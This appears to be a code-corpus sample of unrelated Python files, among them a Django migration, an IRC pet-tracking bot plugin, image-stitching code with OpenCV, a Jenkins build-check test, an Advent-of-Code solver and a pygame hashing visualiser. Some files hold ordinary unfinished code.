if single_input == 'F':
is_axis = True
continue
if single_input == 'O':
output_keys = 'ff0d'
elif single_input == 'Q':
output_keys = '72'
else:
output_keys = ''
# Look at the mapping of the action
mapped_index = button_mapping.find(single_input)
output_buttons[mapped_index] = button_order[mapped_index]
# Write the constructed input line, ignore false positive matches
output_line = f'|{output_keys}|{output_axes}:0:0:0:0:{"".join(output_buttons)}|.........|\n'
try:
for n in range(int(match.group(1))):
self.frame_counter += 1
self.output_file.write(output_line)
except ValueError:
print(f"Ignoring {line[0:-1]}")
print(f"Read {cur_line - start_line} lines from {file.name}")
file.close()
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0012_auto_20160529_0607'),
]
operations = [
migrations.CreateModel(
name='Attachment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uploaded_file', models.FileField(upload_to=b'/user-attachments/')),
('size', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='DiscussionThread',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100, blank=True)),
('description', models.CharField(max_length=1000, blank=True)),
('posted_at', models.DateField()),
('no_of_replies', models.IntegerField(null=True, blank=True)),
('no_of_views', models.IntegerField(null=True, blank=True)),
('posted_by', models.ForeignKey(to='login.UserProfile')),
],
),
migrations.CreateModel(
name='Reply',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('posted_at', models.DateField()),
('text', models.CharField(max_length=b'1000', null=True)),
('posted_by', models.ForeignKey(to='login.UserProfile')),
('thread', models.ForeignKey(to='discussion.DiscussionThread')),
],
),
migrations.AddField(
model_name='attachment',
name='reply',
field=models.ForeignKey(to='discussion.Reply'),
),
]
|
nilq/baby-python
|
python
|
import time
def pets_init_db(db=None):
db.execute("create table if not exists pets"
"(id autoincrement, channel, server, pet_name, owner, species, breed, sex, deceased default 0, added_by, added_on real, modified_by, modified_on real, is_deleted default 0, "
"primary key (id))")
db.execute("create table if not exists pets_pics"
"(id autoincrement, pet_id, added_by, url, is_deleted default 0, "
"primary key (id),"
"foreign key(pet_id) references pets(id))"
@hook.singlethread
def pets_crond(db=None):
pets_init_db(db)
@hook.command
def pets(inp, nick='', chan='', server='', db=None):
inputs = inp.split(" ")
user = inputs[0].lower()
pet_name = inputs[1].lower()
result = db.execute("select pets.pet_name, pets.owner, pets.species, pets.breed, pets.sex, pets_pics.url "
"from pets join pets_pics on pets_pics.pet_id = pets.id "
"where pets.owner = ? and pets.pet_name = ?", (user, pet_name))
@hook.command
def pets_add(inp, nick='', chan='', server='', db=None, autohelp=True):
""".pets_add pet_name,dog_or_cat_or_bird,breed_of_animal,m_or_f"""
inputs = inp.split(",")
for i in inputs:
i.trim()
pet_name = inputs[0].title()
species = inputs[1].title()
breed = inputs[2].title()
sex = inputs[3].upper()
db.execute("insert into pets(channel, server, pet_name, owner, species, breed, sex, added_by, added_on, is_deleted)"
"(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
(chan, server, pet_name, owner, species, breed, sex, nick, time.time(), 0))
@hook.command
def pets_update(inp, nick='', db=None, autohelp=True):
""".pets_update pet_id,pet_name,dog_or_cat_or_bird,breed_of_animal,m_or_f"""
inputs = inp.split(",")
for i in inputs:
i.trim()
pet_id = int(inputs[0])
pet_name = inputs[1].title()
species = inputs[2].title()
breed = inputs[3].title()
sex = inputs[4].upper()
db.execute("update pets set pet_name = ?, owner = ?, species = ?, breed = ?, sex = ?, modified_by = ?, modified_on = ? where id = ?",
(pet_name, owner, species, breed, sex, nick, time.time())
@hook.command
def pets_add_pic(inp, nick='', db=None, autohelp=True):
""".pets_add_pic pet_id,url or .pets_add_pic username,pet_name,url"""
inputs = inp.split(",")
for i in inputs:
i.trim()
pet_id = -1
if len(inputs) == 2:
pet_id = int(inputs[0])
elif len(inputs) == 3:
result = db.execute("select id from pets where lower(owner) = ? and lower(pet_name) = ?",
(inputs[0].lower(), inputs[1].lower())).fetchone()
if result:
pet_id = result[0]
else:
return u"Couldn't find that pet in the database!"
if pet_id != -1:
db.execute("insert into pets_pics(pet_id, added_by, url, is_deleted) "
"values(?, ?, ?, ?)", (pet_id, nick, inputs[1], 0))
else:
return u"Something got messed up and couldn't insert picture into database. Perhaps that pet id doesn't exist."
|
nilq/baby-python
|
python
|
import os
import sys
import json
import urllib2
import base64
import time
from fleet.utility import *
from fleet.utility import LOG as L
from fleet.script import testcase_normal
class TestCase(testcase_normal.TestCase):
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
L.info("*** Start TestCase : %s *** " % __file__)
def test_step_1(self):
result = False
try:
username = self.get("args.userid")
token = self.get("args.password")
url = "%s/job/%s/api/json?token=%s" % (self.get("args.url"), self.get("args.job"), self.get("args.job"))
L.info(url)
request = urllib2.Request(url)
base64string = base64.encodestring('%s:%s' % (username, token)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
r = urllib2.urlopen(request)
root = json.loads(r.read())
latest = int(root['lastBuild']['number'])
success = int(root['lastStableBuild']['number'])
L.debug("Latest Number : %d" % latest )
L.debug("Success Number : %d" % success )
result = latest == success
finally:
r.close()
if result:
timeout = int(self.get("args.timeout"))
L.debug("Timeout : %d " % timeout)
time.sleep(timeout)
else:
L.debug("Retry.")
try:
url2 = "%s/job/%s/build?token=%s&delay=0sec" % (self.get("args.url"), self.get("args.job"), self.get("args.job"))
L.info(url2)
request2 = urllib2.Request(url2)
base64string2 = base64.encodestring('%s:%s' % (username, token)).replace('\n', '')
request2.add_header("Authorization", "Basic %s" % base64string2)
r2 = urllib2.urlopen(request2)
L.debug("HTTP Status Code : %d" % r2.getcode())
self.assertTrue(r2.getcode() == 201)
finally:
r2.close()
@classmethod
def tearDownClass(cls):
L.info("*** End TestCase : %s *** " % __file__)
|
nilq/baby-python
|
python
|
"""
This module manages JwtBundleSet objects.
"""
from typing import Mapping
from pyspiffe.bundle.jwt_bundle.jwt_bundle import JwtBundle
from pyspiffe.spiffe_id.trust_domain import TrustDomain
class JwtBundleSet(object):
"""JwtBundleSet is a set of JWTBundles objects, keyed by trust domain."""
def __init__(self, bundles: Mapping[TrustDomain, JwtBundle]) -> None:
"""Creates a new initialized with the given JWT bundles.
Args:
bundles: A set of JwtBundles to initialize the JwtBundleSet.
"""
self._bundles = bundles
pass
def add(self, jwt_bundle: JwtBundle):
"""Adds a new bundle into the set.
If a bundle already exists for the trust domain, the existing bundle is
replaced.
Args:
jwt_bundle: The new JwtBundle to add.
"""
raise Exception('not implemented.')
def get_jwt_bundle_for_trust_domain(self, trust_domain: TrustDomain) -> JwtBundle:
"""Returns the JWT bundle of the given trust domain.
Args:
trust_domain: The TrustDomain to get a JwtBundle.
Returns:
A JwtBundle for the given TrustDomain.
"""
raise Exception('not implemented.')
|
nilq/baby-python
|
python
|
from pathlib import Path
import cv2
import matplotlib.pyplot as plt
import numpy as np
from scipy.spatial import distance
def match_keypoints(featuresA, featuresB):
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=False)
# ? compute the raw matches and initialize the list of actual matches
rawMatches = bf.knnMatch(featuresA, featuresB, 2)
matches = []
ratio = 0.75
# ? loop over the raw matches and ensure the distance is within
# ? a certain ratio of each other (i.e. Lowe's ratio test)
for m, n in rawMatches:
if m.distance < n.distance * ratio:
matches.append(m)
return matches
def remove_black_border(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
_, thresh = cv2.threshold(gray, 1, 255, cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(
thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE
)
x, y, w, h = cv2.boundingRect(contours[0])
return img[y : y + h, x : x + w]
def get_boundary_points(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
_, thresh = cv2.threshold(gray, 1, 255, cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(
thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE
)
epsilon = 0.005 * cv2.arcLength(contours[0], True)
approx = cv2.approxPolyDP(contours[0], epsilon, True)
# # draw
# cv2.drawContours(img, contours, -1, (255, 255, 255), 3)
# cv2.imshow("Contours", img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# print(f"contours: {len(contours)}")
# print(f"largest contour has {len(contours[0])} points")
# print(f"eps: {epsilon}")
# cv2.drawContours(img, [approx], 0, (255, 255, 255), 3)
# cv2.imshow("Contours", img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
return approx
def order_points(pts):
xSorted = pts[np.argsort(pts[:, 0]), :]
leftMost = xSorted[:2, :]
rightMost = xSorted[2:, :]
leftMost = leftMost[np.argsort(leftMost[:, 1]), :]
(tl, bl) = leftMost
dist = distance.cdist(tl[np.newaxis], rightMost, "euclidean")[0]
(br, tr) = rightMost[np.argsort(dist)[::-1], :]
return np.array([tl, tr, br, bl], dtype="float32")
def four_point_transform(image, pts):
pts = np.array(pts, dtype="float32")
src = order_points(pts)
tl, tr, br, bl = src
widthA, widthB = np.linalg.norm(br - bl), np.linalg.norm(tr - tl)
heightA, heightB = np.linalg.norm(tr - br), np.linalg.norm(tl - bl)
maxWidth, maxHeight = int(max(widthA, widthB)), int(max(heightA, heightB))
dst = [[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]]
dst = np.array(dst, dtype="float32")
dst = order_points(dst)
matrix = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(
image, matrix, (maxWidth, maxHeight), flags=cv2.INTER_LINEAR
)
return warped
def merge_img(queryImg, trainImg):
trainImg_gray = cv2.cvtColor(trainImg, cv2.COLOR_RGB2GRAY)
queryImg_gray = cv2.cvtColor(queryImg, cv2.COLOR_RGB2GRAY)
descriptor = cv2.ORB_create()
kpsA, featuresA = descriptor.detectAndCompute(trainImg_gray, None)
kpsB, featuresB = descriptor.detectAndCompute(queryImg_gray, None)
matches = match_keypoints(featuresA, featuresB)
# ? construct the two sets of points
ptsA = np.float32([kpsA[m.queryIdx].pt for m in matches])
ptsB = np.float32([kpsB[m.trainIdx].pt for m in matches])
# ? estimate the homography between the sets of points
H, _ = cv2.findHomography(ptsA, ptsB, cv2.RANSAC, ransacReprojThreshold=4)
height = trainImg.shape[0] + queryImg.shape[0]
width = trainImg.shape[1] + queryImg.shape[1]
result = np.zeros((height, width, 3), dtype=np.uint8)
result = cv2.warpPerspective(trainImg, H, (width, height))
result[0 : queryImg.shape[0], 0 : queryImg.shape[1]] = queryImg
result = remove_black_border(result)
return result
# def display_result(img1, img2, img12):
# plt.figure(figsize=(25, 9))
# plt.subplot(2, 2, 1)
# plt.imshow(img1)
# plt.title("Image 1", fontsize=16)
# plt.axis("off")
# plt.subplot(2, 2, 2)
# plt.imshow(img2)
# plt.title("Image 2", fontsize=16)
# plt.axis("off")
# plt.subplot(2, 1, 2)
# plt.imshow(img12)
# plt.title("Merged image", fontsize=16)
# plt.axis("off")
# plt.subplot(2, 1, 2)
# plt.imshow(img12)
# plt.title("Merged + warped image", fontsize=16)
# plt.axis("off")
# plt.show()
def display_result(img1, img2, img3, img4):
plt.figure(figsize=(25, 9))
plt.subplot(2, 2, 1)
plt.imshow(img1)
plt.title("Image 1", fontsize=16)
plt.axis("off")
plt.subplot(2, 2, 2)
plt.imshow(img2)
plt.title("Image 2", fontsize=16)
plt.axis("off")
plt.subplot(2, 2, 3)
plt.imshow(img3)
plt.title("Merged image", fontsize=16)
plt.axis("off")
plt.subplot(2, 2, 4)
plt.imshow(img4)
plt.title("Merged + warped image", fontsize=16)
plt.axis("off")
plt.show()
def mainIndividual(images):
for i in range(1, len(images)):
image_merged = merge_img(images[i - 1], images[i])
points = get_boundary_points(image_merged)
print(f"Simplified contour has {len(points)} points")
if len(points) < 4 or len(points) > 6:
print(f"{i}th image has {len(points)} points")
break
elif len(points) == 4:
warped = four_point_transform(image_merged, points)
elif len(points) == 5:
warped = four_point_transform(
image_merged, [points[i][0] for i in [0, 1, 3, 4]]
)
elif len(points) == 6:
warped = four_point_transform(
image_merged, [points[i][0] for i in [0, 1, 3, 5]]
)
display_result(images[i - 1], images[i], image_merged, warped)
def mainCombined(images):
image_last = images[0]
for i in range(1, len(images)):
image_merged = merge_img(image_last, images[i])
points = get_boundary_points(image_merged)
print(f"Simplified contour has {len(points)} points")
if len(points) < 4 or len(points) > 6:
print(f"{i}th image has {len(points)} points")
break
elif len(points) == 4:
warped = four_point_transform(image_merged, points)
elif len(points) == 5:
warped = four_point_transform(
image_merged, [points[i][0] for i in [0, 1, 3, 4]]
)
elif len(points) == 6:
warped = four_point_transform(
image_merged, [points[i][0] for i in [0, 1, 3, 5]]
)
display_result(image_last, images[i], image_merged, warped)
image_last = warped
if __name__ == "__main__":
IMG_DIR = "dataset/3"
filepaths = sorted(Path(IMG_DIR).glob("*.jpeg"))
images = [cv2.imread(str(path)) for path in filepaths]
mainIndividual(images)
# mainCombined(images)
# img1 = cv2.imread("dataset/3/0.jpeg")
# img2 = cv2.imread("dataset/3/1.jpeg")
# img12 = merge_img(img1, img2)
# display_result(img1, img2, img12)
# img = image_merged.copy()
# print(points)
# for [[x, y]] in points:
# cv2.putText(
# img,
# f"{x}, {y}",
# (x, y),
# cv2.FONT_HERSHEY_SIMPLEX,
# 1,
# (255, 0, 0),
# 2,
# )
# cv2.imshow("image", img)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
|
nilq/baby-python
|
python
|
import sys
input = sys.stdin.readline
for i in range(1,int(input())+1):
print("Hello World, Judge {}!".format(i))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# encoding: utf-8
'''
mirna.py
Created by Joan Smith
on 2019-8-29.
Copyright (c) 2019 All rights reserved.
'''
import pandas as pd
import numpy as np
import argparse
import sys
import os
import biomarker_survival as surv
from .zscore_common import ZscoreCommon
def get_options(argv):
parser = argparse.ArgumentParser(description='Get mirna file, clinical file, optional output dir')
parser.add_argument('-m', action='store', dest='mirna')
parser.add_argument('-c', action='store', dest='tcga_cdr')
parser.add_argument('-p', action='store', dest='parallel', type=int)
parser.add_argument('-o', action='store', dest='output_directory', default='.')
ns = parser.parse_args()
return ns.mirna, ns.tcga_cdr, ns.output_directory, ns.parallel
def prep_data(mirna_path, extra_data=None):
mirna = pd.read_csv(mirna_path, header=0, na_values='???', index_col=0)
mirna = mirna.drop('Correction', axis=1)
mirna_log2 = mirna.apply(np.log2)
mirna_clipped_log2 = mirna_log2.clip(lower=0)
return mirna_clipped_log2.T.reset_index()
def ctype_cleaning(df, ctype, ctype_ctype_clinical): #ctype_clinical unused
df = surv.maybe_clear_non_01s(df, 'index', ctype)
df = surv.add_identifier_column(df, 'index')
df = df.set_index('identifier')
df = df.drop('index', axis=1)
return df
def metadata(mirna, clinical):
mirna_zscores = ZscoreCommon(prep_data, ctype_cleaning)
return mirna_zscores.metadata(mirna, clinical)
def zscores(mirna, clinical, outdir, parallel, additional_vars={}):
mirna_zscores = ZscoreCommon(prep_data, ctype_cleaning)
mirna_zscores.zscores(mirna, clinical, outdir, parallel_workers=parallel, additional_vars=additional_vars)
pancan_df = surv.pancan(outdir, multivariate=(len(additional_vars) > 0))
pancan_df.to_csv(os.path.join(outdir, 'pancan.csv'), index_label='gene')
def main(argv=None):
mirna, clinical, outdir, parallel = get_options(argv)
zscores(mirna, clinical, outdir, parallel)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import hashlib
from collections import namedtuple
from collections import deque
passcode = 'edjrjqaa'
target = (3, 3)
State = namedtuple('state', ['path', 'location'])
maze = {}
visited = []
moves = {
'U': (0, -1),
'D': (0, 1),
'L': (-1, 0),
'R': (1, 0)
}
def is_valid(state):
if any(i < 0 or i > 3 for i in state.location):
return False
return True
def done(state):
return state.location == target
def get_open_doors(path):
md5 = hashlib.md5(passcode + path).hexdigest()
doors = zip('UDLR', [True if ord(c) >= ord('b') else False for c in md5[:4]])
return [d[0] for d in doors if d[1]]
def next_states(state):
open_doors = get_open_doors(state.path)
next_states = []
for d in open_doors:
next_state = State(path=state.path+d, location=(state.location[0] + moves[d][0], state.location[1] + moves[d][1]))
if is_valid(next_state):
next_states.append(next_state)
return next_states
has_part_1 = False
has_part_2 = False
initial_state = State(path='', location=(0, 0))
q = deque([initial_state])
longest = 0
while q:
s = q.popleft()
if not has_part_1 and done(s):
print "Part 1:", s.path
has_part_1 = True
if done(s):
print s
longest = max(longest, len(s.path))
continue
for next_s in next_states(s):
q.append(next_s)
else:
print "Part 2:", longest
|
nilq/baby-python
|
python
|
"""
"""
from collections import Counter
import random
import pandas as pd
import numpy as np
import tensorflow as tf
import time
def simple_train_test_split(df, p=0.90):
n = df.shape[0]
train_n, test_n = int(n*p), n-int(n*p)
train_test = [0]*train_n + [1]*test_n
random.shuffle(train_test)
train_test = np.array(train_test)
test = df[["sent", "emoji"]].loc[train_test == 1].copy()
train = df.iloc[train_test == 0].copy()
return train, test
def _bytes_feature(value):
"""
Returns a bytes_list from a string / byte.
Example:
>>> _bytes_feature("test".encode("utf-8"))
...
>>> _bytes_feature("test")
...
"""
if isinstance(value, type(tf.constant(0))):
# BytesList won't unpack a string from an EagerTensor.
value = value.numpy()
if not isinstance(value, (bytes, bytearray)):
# BytesList won't unpack a string from an EagerTensor.
value = value.encode("utf-8")
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
"""
Returns an int64_list from a bool / enum / int / uint.
Examples:
>>> _int64_feature(1)
...
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def write_tf_record(df, path):
with tf.io.TFRecordWriter("data/twitter_emoji_sent.tfrecords") as writer:
for row in df.itertuples():
features = {'sent': _bytes_feature(row.sent),
'labels': _int64_feature(row.emoji)}
tf_example = tf.train.Example(
features=tf.train.Features(feature=features))
writer.write(tf_example.SerializeToString())
class EmojiUpsample():
def __init__(self, df, n_emoji=150):
self.n_emoji = n_emoji
self.df = df
self.df = self.df.set_index("id", drop=False)
self.make_count()
# remove most common value from sampling
i, n = self.count.most_common(1)[0]
self.count.pop(i)
# for testing - should pop anything in actual run
for i in list(self.count):
if self.count[i] == 0:
self.count.pop(i)
self.max_val = n
def make_count(self):
self.sample_dict = {}
self.count = Counter()
for i in range(1, self.n_emoji + 1):
ids = self.df.id[self.df.emoji.apply(lambda x: i in x)].tolist()
n = len(ids)
_ = {"ids": ids, "start_count": n, "end_count": n}
self.sample_dict[i] = _
self.count[i] = n
def sample_new(self):
# remove if have more than max
for k in list(self.count):
if self.sample_dict[k]['end_count'] >= self.max_val:
self.count.pop(k)
_ = [(i, (self.count[i]/sum(self.count.values()))**-1)
for i in self.count.keys()]
population, weights = zip(*_)
# sample emoji
i = random.choices(population, weights=weights, k=1)[0]
self.sample_dict[i]['end_count'] += 1
id_population = self.sample_dict[i]['ids']
id_ = random.choice(id_population)
return self.df.loc[id_]
def upsample(self, k, verbose=True):
if verbose:
last = max(self.sample_dict.keys())
second = min(self.sample_dict.keys()) + 1
n_last = self.sample_dict[last]["end_count"]
n_20 = self.sample_dict[20]["end_count"]
n_second = self.sample_dict[second]["end_count"]
print(f"# 2nd / # 1st: {round(n_second/self.max_val, 3)}\n",
f"# 20th / # 1st: {round(n_20/self.max_val, 3)}\n",
f"# last / # 1st: {round(n_last/self.max_val, 3)}\n")
st = time.time()
l = []
for i in range(k):
s = self.sample_new()
# self.df = self.df.append(s)
l.append(st-time.time())
st = time.time()
print("rolling mean time:", np.mean(np.array(l)))
if verbose:
last = max(self.sample_dict.keys())
second = min(self.sample_dict.keys()) + 1
n_last = self.sample_dict[last]["end_count"]
n_20 = self.sample_dict[20]["end_count"]
n_second = self.sample_dict[second]["end_count"]
print(f"# 2nd / # 1st: {round(n_second/self.max_val, 3)}\n",
f"# 20th / # 1st: {round(n_20/self.max_val, 3)}\n",
f"# last / # 1st: {round(n_last/self.max_val, 3)}\n")
def to_long(df):
res = []
for row in df.itertuples():
for tag in row.emoji:
res.append((row.sent, tag))
return pd.DataFrame(res, columns="sent emoji".split(" "))
def main():
df = pd.read_json("data/emoji_sent_clustered.json")
df = df.head(1000)
df = to_long(df)
df.ranom
train, test = simple_train_test_split(df)
eu = EmojiUpsample(train)
eu.upsample(k=100)
write_tf_record(train, "data/tfrecords/train.tfrecords")
write_tf_record(test, "data/tfrecords/test.tfrecords")
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
"""Constants"""
import os
PATH = os.environ.get('HA_CONFIG_PATH', '/config')
VERSION = '1.2.0'
REDIS_TOPIC_BASE = 'custom_component_store_'
DEMO = os.environ.get('DEMO')
DEMOTEXT = "This is a demo"
DOMAINS = ['sensor', 'switch', 'media_player', 'climate', 'light',
'binary_sensor']
EXAMPLE = {
"sensor.example": {
"trackable": True,
"embedded_path": "/custom_components/example/sensor.py",
"version": VERSION,
"installed": False,
"imagelink": "https://images.pexels.com/photos/577585/pexels-photo-577585.jpeg?auto=compress&cs=tinysrgb&dpr=2&h=650&w=940", # pylint: disable=C0301
"visit_repo": "https://github.com/ludeeus/custom-component-store",
"embedded_path_remote": "https://github.com/ludeeus/custom-component-store",
"changelog": "https://github.com/ludeeus/custom-component-store",
"embedded": True,
"has_update": False,
"local_location": "/custom_components/sensor/example.py",
"local_version": VERSION,
"author": {
"login": "ludeeus",
"html_url": "https://github.com/ludeeus"
},
"description": "Example sensor entity.",
"remote_location": "https://github.com/ludeeus/custom-component-store"
}
}
|
nilq/baby-python
|
python
|
# encoding: utf-8
from typing import Any
from jinja2.ext import babel_extract
from ckan.lib.jinja_extensions import _get_extensions
def extract_ckan(fileobj: Any, *args: Any, **kw: Any) -> Any:
extensions = [
':'.join([ext.__module__, ext.__name__])
if isinstance(ext, type)
else ext
for ext in _get_extensions()
]
if 'options' not in kw:
kw['options'] = {}
if 'trimmed' not in kw['options']:
kw['options']['trimmed'] = 'True'
if 'silent' not in kw['options']:
kw['options']['silent'] = 'False'
if 'extensions' not in kw['options']:
kw['options']['extensions'] = ','.join(extensions)
return babel_extract(fileobj, *args, **kw)
|
nilq/baby-python
|
python
|
import pygame
import pygame_menu
import src # our source module with the algorithms
import sys # another python library, here enables us to
import hlp # module with the helper functions
# activate flag for algorithm list menu
intro2 = False
# introduction menu
#clk = pygame.time.Clock()
pygame.init()
secret = ""
def StartIntro2():
global intro2 # access the global variable
intro2 = True # turn it true, these are all helper functions
def Introduction():
'''
setting the intro menu
'''
global intro2, secret # accessing global variable
pygame.display.set_caption("Hashing Algorithms Visualization Tool")
while intro2 == False: # initial loop and setting the exit
src.display.fill((0,0,0)) # setting the display colour
src.display.blit(src.bg,(0,0)) ## this is a pygame method allowing us to paste objects into the screen. it takes pixel location and the object as arguments.
# pygame method, iterates over the events in pygame to determine what we are doing with every event
for event in pygame.event.get():
if event.type == pygame.QUIT: # this one quits
pygame.quit() # putting the quit pygame method
exit() # takes the user from GUI to the script for exiting
if event.type == pygame.KEYUP: # Here is to tell the computer to recognise if a keybord key is pressed.
if event.key == pygame.K_ESCAPE: # if that keyboard key is ESC
exit() # call for the exit function.
if event.type == pygame.MOUSEBUTTONDOWN: # starting the initial loop with first game events, i.e. quit and mouse button
if event.button == 1: # pygame method defining the button in the GUI
pos = pygame.mouse.get_pos() # displays the mouse position on the screen
# starting the initial loop with first game events, ie. quit and mouse button
if xwidth < pos[0] < xwidth+120 and 350 < pos[1] < 350+30:
srctTxt = hlp.InsertSecret("Text for Encription:") # getting the number of lines
if srctTxt != "": # if the string is not empty
try:
# input gives string so this one turns it into an integer
secret = srctTxt
StartIntro2()
except: # if that is not happening
secret = "N/A"
font = pygame.font.Font(src.bitterfont, 21) # creating font with size
# creating font pygame text object with size, colour and text
renderedText = font.render("Welcome to the Hashing Algorithms Comparison Tool", True, (255,255,255))
# displaying text on the screen, pos is the position of where it should appear
surface = pygame.display.get_surface()
xwidth = (surface.get_width()/2) - 60
twidth = surface.get_width() /2 - renderedText.get_width()/2
src.display.blit(renderedText, (twidth,140))
hlp.Button("Insert Message", xwidth, 350, 120, 30, None)
hlp.Button("Continue", xwidth, 400, 120, 30, StartIntro2) # continue button
hlp.Button("Exit", xwidth, 450, 120,
30, sys.exit)
# updates the screen every turn
pygame.display.flip()
# will not run more than 10 frames per second
src.clock.tick(60)
Introduction2() # calls back the introduction function
# algorithm list menu
def Introduction2():
'''
Setting the algorithms menu
'''
display = pygame.display.set_mode((1280, 550),pygame.FULLSCREEN | pygame.DOUBLEBUF) # seting the display
# pygame method for captioning
pygame.display.set_caption("Hashing Comparison Tool")
#src.ChangeColour() # calling change colour function
while True: # stating the loop
display.fill((0,0,0)) # setting the display colour
src.display.blit(src.bg,(0,0)) # this is a pygame method allowing us to paste objects into the screen. it takes pixel location and the object as arguments.
# pygame method, iterates over the events in pygame to determine what we are doing with every event
for event in pygame.event.get():
if event.type == pygame.QUIT: # this one quits
pygame.quit() # putting the quit pygame method
exit() # takes the user from GUI to the script for exiting
if event.type == pygame.KEYUP: # Here is to tell the computer to recognise if a keybord key is pressed.
if event.key == pygame.K_ESCAPE: # if that keyboard key is ESC
exit() # call for the exit function.
surface = pygame.display.get_surface()
xwidth = (surface.get_width()/2) - 125
pygame.draw.rect(display, hlp.button_colour, (xwidth-7, 85, 264, 395), 3)
v1 = hlp.ButtonWithReturn("MD5 Algorithm", xwidth, 90, 250,
30, 1) # positioning function buttons
v2 = hlp.ButtonWithReturn("SHA1 Algorithm", xwidth, 190,
250, 30, 2) # positioning function buttons
v3 = hlp.ButtonWithReturn("SHA256 Algorithm", xwidth, 290, 250,
30, 3) # positioning function buttons
#v4 = hlp.ButtonWithReturn("Efficiency Comparison",xwidth, 390, 250,
#30, 4) # positioning function buttons
hlp.Button("Exit to Desktop", xwidth, 390, 250,
30, sys.exit) # adding an exit button
if v1 > 0 or v2 > 0 or v3 > 0: # if any is chosen, break the loop and go to the choice
break
pygame.display.flip() # updates the screen every turn
src.clock.tick(60) # will not run more than 10 frames per second
if v1 > 0: # calling for choice functions to go for
src.dspMd5() # calling for choice functions to go for
elif v2 > 0: # calling for choice functions to go for
src.dspSHA1() # calling for choice functions to go for
elif v3 > 0: # calling for choice functions to go for
src.dspSHA256() # calling for choice functions to go for
|
nilq/baby-python
|
python
|
import pandas as pd
from kiwis_pie import KIWIS
k = KIWIS('http://www.bom.gov.au/waterdata/services')
def get_cc_hrs_station_list(update = False):
"""
Return list of station IDs that exist in HRS and are supplied by providers that license their data under the Creative Commons license.
:param update: Flag to indicate if cached station information should be fetched from WISKI again (and saved to disk as CSV).
:type update: boolean
"""
if update:
stations = k.get_timeseries_list(parametertype_name = 'Water Course Discharge', ts_name = 'DMQaQc.Merged.DailyMean.09HR')
stations.to_csv('available_watercoursedischarge_stations.csv')
else:
stations = pd.read_csv('available_watercoursedischarge_stations.csv', index_col=0)
hrs_stations = pd.read_csv('hrs_station_list.csv', skiprows=1)
station_subset = stations.ix[stations.station_no.isin(hrs_stations.station_id)]
if update:
station_attrs = []
for i, station in station_subset.iterrows():
attrs = k.get_station_list(station_no = station.station_no, parametertype_name = 'Water Course Discharge', return_fields=['station_id','station_no','custom_attributes'])
station_attrs.append(attrs.set_index('station_id'))
station_attributes = pd.concat(station_attrs).drop_duplicates()
station_attributes.to_csv('station_attributes.csv')
else:
station_attributes = pd.read_csv('station_attributes.csv', index_col=0)
cc_providers = pd.read_csv('cc_providers.csv', skiprows=8)
station_list = station_attributes.ix[station_attributes.DATA_OWNER.isin(cc_providers.ProviderID.values)].station_no
return station_list.drop_duplicates()
if __name__ == "__main__":
for station in get_cc_hrs_station_list():
print(station)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import copy
import json
from pathlib import Path
from typing import List
import pytest
import alkymi as alk
from alkymi import serialization, AlkymiConfig, checksums
from alkymi.serialization import OutputWithValue
def test_serialize_item(tmpdir):
tmpdir = Path(str(tmpdir))
cache_path_generator = (tmpdir / str(i) for i in range(5))
result = serialization.serialize_item(Path("/test_path/test.txt"), cache_path_generator)
assert result.startswith(serialization.PATH_TOKEN)
test_string = "test_string"
result = serialization.serialize_item(test_string, cache_path_generator)
assert result == test_string
# Test serialization of dicts
result = serialization.serialize_item(dict(key="value"), cache_path_generator)
assert isinstance(result, dict)
assert result["keys"] == ["key"]
assert result["values"] == ["value"]
# test serialization of standard types
items = [0, "1", 2.5, True, None]
result = serialization.serialize_item(items, cache_path_generator)
print(items)
assert result == items
def test_serialize_deserialize_items(tmpdir):
tmpdir = Path(str(tmpdir))
json_str = "{'test': 13 []''{}!!"
items = (Path("test"), "test2", 42, 1337.0, [1, 2, 3], {"key": "value", "key2": 5}, json_str)
cache_path_generator = (tmpdir / str(i) for i in range(5))
serialized_items = serialization.serialize_item(items, cache_path_generator)
assert serialized_items is not None
assert len(serialized_items) == len(items)
assert isinstance(serialized_items[0], str)
assert isinstance(serialized_items[1], str)
assert isinstance(serialized_items[2], int)
assert isinstance(serialized_items[3], float)
assert isinstance(serialized_items[4], list)
assert len(serialized_items[4]) == len(items[4])
assert isinstance(serialized_items[5], dict)
assert isinstance(serialized_items[6], str)
# Pass through JSON serialization to ensure we can save/load correctly
serialized_items = json.loads(json.dumps(serialized_items, indent=4))
deserialized_items = serialization.deserialize_item(serialized_items)
assert deserialized_items is not None
assert len(deserialized_items) == len(items)
for deserialized_item, item in zip(deserialized_items, items):
assert deserialized_item == item
def test_recipe_serialization(tmpdir):
AlkymiConfig.get().cache = True
tmpdir = Path(str(tmpdir))
